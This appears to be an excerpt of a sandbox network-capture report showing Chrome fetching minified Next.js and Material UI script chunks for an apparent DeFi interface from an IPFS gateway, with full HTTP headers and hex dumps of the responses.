                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 74 68 22 2c 60 73 69 7a 65 24 7b 28 30 2c 75 2e 5a 29 28 61 29 7d 60 2c 69 5d 7d 3b 72 65 74 75 72 6e 28 30 2c 73 2e 5a 29 28 6c 2c 68 2c 74 29 7d 29 28 43 29 3b 72 65 74 75 72 6e 28 30 2c 66 2e 6a 73 78 29 28 6d 2c 28 30 2c 6f 2e 5a 29 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 45 2e 72 6f 6f 74 2c 6c 29 2c 64 69 73 61 62 6c 65 64 3a 70 2c 66 6f 63 75 73 52 69 70 70 6c 65 3a 21 62 2c 72 65 66 3a 74 2c 6f 6e 43 6c 69 63 6b 3a 65 3d 3e 7b 67 26 26 28 67 28 65 2c 77 29 2c 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 29 7c 7c 79 26 26 79 28 65 2c 77 29 7d 2c 6f 6e 43 68 61 6e 67 65 3a 79 2c 76 61 6c 75 65 3a 77 2c 6f 77 6e 65 72 53 74 61 74 65 3a 43 2c 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 3a 6a 7d 2c 41 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: th",`size${(0,u.Z)(a)}`,i]};return(0,s.Z)(l,h,t)})(C);return(0,f.jsx)(m,(0,o.Z)({className:(0,i.default)(E.root,l),disabled:p,focusRipple:!b,ref:t,onClick:e=>{g&&(g(e,w),e.defaultPrevented)||y&&y(e,w)},onChange:y,value:w,ownerState:C,"aria-pressed":j},A,{
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 69 6f 6e 3f 7b 22 26 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 6d 61 72 67 69 6e 4c 65 66 74 3a 2d 31 2c 62 6f 72 64 65 72 4c 65 66 74 3a 22 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 62 6f 72 64 65 72 54 6f 70 4c 65 66 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 30 7d 2c 22 26 3a 6e 6f 74 28 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 62 6f 72 64 65 72 54 6f 70 52 69 67 68 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69 67 68 74 52 61 64 69 75 73 3a 30 7d 2c 5b 60 26 2e 24 7b 68 2e 73 65 6c 65 63 74 65 64 7d 20 2b 20 2e 24 7b 68 2e 67 72 6f 75 70 65 64 7d 2e 24 7b 68 2e 73 65 6c 65 63 74 65 64 7d 60 5d 3a 7b 62 6f 72
                                                                                                                                                                                                                                                  Data Ascii: ion?{"&:not(:first-of-type)":{marginLeft:-1,borderLeft:"1px solid transparent",borderTopLeftRadius:0,borderBottomLeftRadius:0},"&:not(:last-of-type)":{borderTopRightRadius:0,borderBottomRightRadius:0},[`&.${h.selected} + .${h.grouped}.${h.selected}`]:{bor
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 6d 65 6e 74 28 65 29 3f 61 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 54 2e 67 72 6f 75 70 65 64 2c 65 2e 70 72 6f 70 73 2e 63 6c 61 73 73 4e 61 6d 65 29 2c 6f 6e 43 68 61 6e 67 65 3a 79 3f 42 3a 6b 2c 73 65 6c 65 63 74 65 64 3a 76 6f 69 64 20 30 3d 3d 3d 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 3f 64 28 65 2e 70 72 6f 70 73 2e 76 61 6c 75 65 2c 41 29 3a 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 2c 73 69 7a 65 3a 65 2e 70 72 6f 70 73 2e 73 69 7a 65 7c 7c 77 2c 66 75 6c 6c 57 69 64 74 68 3a 67 2c 63 6f 6c 6f 72 3a 65 2e 70 72 6f 70 73 2e 63 6f 6c 6f 72 7c 7c 68 2c 64 69 73 61 62 6c 65 64 3a 65 2e 70 72 6f 70 73 2e 64 69 73 61 62 6c 65 64 7c 7c 6d 7d 29 3a 6e 75 6c
                                                                                                                                                                                                                                                  Data Ascii: ment(e)?a.cloneElement(e,{className:(0,i.default)(T.grouped,e.props.className),onChange:y?B:k,selected:void 0===e.props.selected?d(e.props.value,A):e.props.selected,size:e.props.size||w,fullWidth:g,color:e.props.color||h,disabled:e.props.disabled||m}):nul
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 29 2e 74 6f 46 69 78 65 64 28 32 29 29 3b 72 65 74 75 72 6e 28 30 2c 75 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 67 3f 28 30 2c 75 2e 6a 73 78 29 28 63 2e 42 2c 62 28 7b 63 6f 6d 70 61 63 74 3a 21 30 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 6c 75 65 3a 6d 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 32 2c 76 61 72 69 61 6e 74 3a 6e 75 6c 6c 21 3d 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 68 33 22 2c 22 64 61 74 61 2d 63 79 22 3a 22 61 70 79 22 7d 2c 68 29 29 3a 28 30 2c 75 2e 6a 73 78 73 29 28 75 2e 46 72 61 67 6d 65 6e 74 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: ).toFixed(2));return(0,u.jsx)(i.Z,{sx:{display:"flex",alignItems:"center",justifyContent:"center"},children:g?(0,u.jsx)(c.B,b({compact:!0,percent:!0,value:m,visibleDecimals:2,variant:null!==n&&void 0!==n?n:"h3","data-cy":"apy"},h)):(0,u.jsxs)(u.Fragment,{
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 2e 5a 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 74 68 65 6d 65 3b 72 65 74 75 72 6e 7b 62 6f 72 64 65 72 3a 22 30 70 78 22 2c 66 6c 65 78 3a 31 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 33 38 33 44 35 31 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 3a 68 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 46 46 46 46 46 46 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 22 7d 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 64 69 73 61 62 6c 65 64 22 3a 7b 7a 49 6e 64 65 78 3a 31 30 30 2c 68 65 69 67 68 74 3a 22 31 30
                                                                                                                                                                                                                                                  Data Ascii: .Z)((function(e){var t=e.theme;return{border:"0px",flex:1,backgroundColor:"#383D51",borderRadius:"4px","&.Mui-selected, &.Mui-selected:hover":{backgroundColor:"#FFFFFF",borderRadius:"4px !important"},"&.Mui-selected, &.Mui-disabled":{zIndex:100,height:"10
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 73 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6e 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                  Data Ascii: .push.apply(r,n)}return r}function l(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?s(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnProp
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 73 65 72 76 65 44 61 74 61 2c 52 3d 4e 75 6d 62 65 72 28 79 29 2c 53 3d 52 3e 3d 44 2e 67 68 6f 4d 69 6e 44 69 73 63 6f 75 6e 74 54 6f 6b 65 6e 42 61 6c 61 6e 63 65 46 6f 72 44 69 73 63 6f 75 6e 74 2c 50 3d 28 30 2c 78 2e 6a 73 78 29 28 78 2e 46 72 61 67 6d 65 6e 74 2c 7b 7d 29 2c 5a 3d 67 7c 7c 43 3b 72 65 74 75 72 6e 20 5a 26 26 28 50 3d 28 30 2c 78 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 70 79 3a 34 2c 70 78 3a 36 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 2c 6c 69 6e 65 48 65 69 67 68 74 3a 22 31 36 70 78 22 2c 61 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 2c 6c 69 6e 65 48 65 69 67 68 74 3a 22 31 36 70 78 22 2c 66 6f 6e 74 57 65 69 67 68 74 3a 35 30 30 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 73 29 28 69 2e 5a 2c
                                                                                                                                                                                                                                                  Data Ascii: serveData,R=Number(y),S=R>=D.ghoMinDiscountTokenBalanceForDiscount,P=(0,x.jsx)(x.Fragment,{}),Z=g||C;return Z&&(P=(0,x.jsx)(a.Z,{sx:{py:4,px:6,fontSize:"12px",lineHeight:"16px",a:{fontSize:"12px",lineHeight:"16px",fontWeight:500}},children:(0,x.jsxs)(i.Z,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  18192.168.2.549729209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC738OUTGET /_next/static/chunks/330.182af63f38cc0e3d.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 7572
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreieptetgj2mm5aqgsfqfkg4ujvobb76pw6ggxtfgz3mzjws3k3pxii"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/330.182af63f38cc0e3d.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreieptetgj2mm5aqgsfqfkg4ujvobb76pw6ggxtfgz3mzjws3k3pxii
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028474
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 63 65 66 31 39 31 37 62 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e40cef1917b1-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1306INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 33 30 5d 2c 7b 38 37 30 35 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 6f 3d 72 28 36 33 33 36 36 29 2c 61 3d 72 28 38 37 34 36 32 29 2c 6e 3d 72 28 36 37 32 39 34 29 2c 69 3d 72 28 38 36 30 31 30 29 2c 6c 3d 72 28 39 34 37 38 30 29 2c 73 3d 72 28 34 31 37 39 36 29 2c 64 3d 72 28 38 33 31 38 37 29 2c 63 3d 72 28 33 36 36 32 32 29 2c 75 3d 72 28 37 38 38 38 34 29 2c 70 3d 72 28 38 31 37 31 39 29 2c 66 3d 72 28 33 34 38 36 37 29 3b
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[330],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var o=r(63366),a=r(87462),n=r(67294),i=r(86010),l=r(94780),s=r(41796),d=r(83187),c=r(36622),u=r(78884),p=r(81719),f=r(34867);
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 70 78 20 73 6f 6c 69 64 20 24 7b 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 42 61 63 6b 67 72 6f 75 6e 64 7d 60 7d 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 43 68 61 6e 6e 65 6c 7d 20 2f 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 60 3a 28 30 2c 73 2e 46 71 29 28 65 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 2c 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65
                                                                                                                                                                                                                                                  Data Ascii: px solid ${(e.vars||e).palette.action.disabledBackground}`},"&:hover":{textDecoration:"none",backgroundColor:e.vars?`rgba(${e.vars.palette.text.primaryChannel} / ${e.vars.palette.action.hoverOpacity})`:(0,s.Fq)(e.palette.text.primary,e.palette.action.hove
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 72 3a 69 7d 3d 65 2c 73 3d 7b 72 6f 6f 74 3a 5b 22 72 6f 6f 74 22 2c 6f 26 26 22 73 65 6c 65 63 74 65 64 22 2c 61 26 26 22 64 69 73 61 62 6c 65 64 22 2c 72 26 26 22 66 75 6c 6c 57 69 64 74 68 22 2c 60 73 69 7a 65 24 7b 28 30 2c 63 2e 5a 29 28 6e 29 7d 60 2c 69 5d 7d 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 5a 29 28 73 2c 67 2c 74 29 7d 29 28 78 29 3b 72 65 74 75 72 6e 28 30 2c 76 2e 6a 73 78 29 28 6d 2c 28 30 2c 61 2e 5a 29 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 6b 2e 72 6f 6f 74 2c 73 29 2c 64 69 73 61 62 6c 65 64 3a 70 2c 66 6f 63 75 73 52 69 70 70 6c 65 3a 21 66 2c 72 65 66 3a 74 2c 6f 6e 43 6c 69 63 6b 3a 65 3d 3e 7b 52 26 26 28 52 28 65 2c 77 29 2c 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 29 7c 7c 79 26
                                                                                                                                                                                                                                                  Data Ascii: r:i}=e,s={root:["root",o&&"selected",a&&"disabled",r&&"fullWidth",`size${(0,c.Z)(n)}`,i]};return(0,l.Z)(s,g,t)})(x);return(0,v.jsx)(m,(0,a.Z)({className:(0,i.default)(k.root,s),disabled:p,focusRipple:!f,ref:t,onClick:e=>{R&&(R(e,w),e.defaultPrevented)||y&
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 30 25 22 7d 2c 7b 5b 60 26 20 2e 24 7b 67 2e 67 72 6f 75 70 65 64 7d 60 5d 3a 28 30 2c 61 2e 5a 29 28 7b 7d 2c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 65 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3f 7b 22 26 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 6d 61 72 67 69 6e 4c 65 66 74 3a 2d 31 2c 62 6f 72 64 65 72 4c 65 66 74 3a 22 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 62 6f 72 64 65 72 54 6f 70 4c 65 66 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 30 7d 2c 22 26 3a 6e 6f 74 28 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 62 6f 72 64 65 72 54 6f 70 52 69 67 68 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69 67 68 74 52 61
                                                                                                                                                                                                                                                  Data Ascii: 0%"},{[`& .${g.grouped}`]:(0,a.Z)({},"horizontal"===e.orientation?{"&:not(:first-of-type)":{marginLeft:-1,borderLeft:"1px solid transparent",borderTopLeftRadius:0,borderBottomLeftRadius:0},"&:not(:last-of-type)":{borderTopRightRadius:0,borderBottomRightRa
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1369INData Raw: 3a 74 2c 6f 77 6e 65 72 53 74 61 74 65 3a 6b 7d 2c 78 2c 7b 63 68 69 6c 64 72 65 6e 3a 6e 2e 43 68 69 6c 64 72 65 6e 2e 6d 61 70 28 73 2c 28 65 3d 3e 6e 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 65 29 3f 6e 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 7a 2e 67 72 6f 75 70 65 64 2c 65 2e 70 72 6f 70 73 2e 63 6c 61 73 73 4e 61 6d 65 29 2c 6f 6e 43 68 61 6e 67 65 3a 79 3f 4f 3a 42 2c 73 65 6c 65 63 74 65 64 3a 76 6f 69 64 20 30 3d 3d 3d 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 3f 75 28 65 2e 70 72 6f 70 73 2e 76 61 6c 75 65 2c 24 29 3a 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 2c 73 69 7a 65 3a 65 2e 70 72 6f 70 73 2e 73 69 7a 65 7c 7c 77 2c 66 75 6c 6c 57 69 64
                                                                                                                                                                                                                                                  Data Ascii: :t,ownerState:k},x,{children:n.Children.map(s,(e=>n.isValidElement(e)?n.cloneElement(e,{className:(0,i.default)(z.grouped,e.props.className),onChange:y?O:B,selected:void 0===e.props.selected?u(e.props.value,$):e.props.selected,size:e.props.size||w,fullWid
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC790INData Raw: 74 63 68 43 61 6c 6c 73 28 66 2e 6f 6e 45 72 72 6f 72 29 29 2c 66 2e 6f 6e 53 75 63 63 65 73 73 26 26 28 66 2e 6f 6e 53 75 63 63 65 73 73 3d 6e 2e 56 2e 62 61 74 63 68 43 61 6c 6c 73 28 66 2e 6f 6e 53 75 63 63 65 73 73 29 29 2c 66 2e 6f 6e 53 65 74 74 6c 65 64 26 26 28 66 2e 6f 6e 53 65 74 74 6c 65 64 3d 6e 2e 56 2e 62 61 74 63 68 43 61 6c 6c 73 28 66 2e 6f 6e 53 65 74 74 6c 65 64 29 29 2c 28 30 2c 63 2e 46 62 29 28 66 29 2c 28 30 2c 64 2e 70 66 29 28 66 2c 70 29 2c 28 30 2c 64 2e 4a 4e 29 28 70 29 3b 63 6f 6e 73 74 5b 67 5d 3d 6f 2e 75 73 65 53 74 61 74 65 28 28 28 29 3d 3e 6e 65 77 20 74 28 72 2c 66 29 29 29 2c 68 3d 67 2e 67 65 74 4f 70 74 69 6d 69 73 74 69 63 52 65 73 75 6c 74 28 66 29 3b 69 66 28 28 30 2c 61 2e 24 29 28 6f 2e 75 73 65 43 61 6c 6c 62
                                                                                                                                                                                                                                                  Data Ascii: tchCalls(f.onError)),f.onSuccess&&(f.onSuccess=n.V.batchCalls(f.onSuccess)),f.onSettled&&(f.onSettled=n.V.batchCalls(f.onSettled)),(0,c.Fb)(f),(0,d.pf)(f,p),(0,d.JN)(p);const[g]=o.useState((()=>new t(r,f))),h=g.getOptimisticResult(f);if((0,a.$)(o.useCallb


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  19192.168.2.549731209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC739OUTGET /_next/static/chunks/4787.c9a9f6a64640a9a2.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:41 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:41 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 11062
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiheb5bkcywhht2bxxreu3cmpnaqznacmsesn4behswq55vfinow6y"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4787.c9a9f6a64640a9a2.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiheb5bkcywhht2bxxreu3cmpnaqznacmsesn4behswq55vfinow6y
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7472207
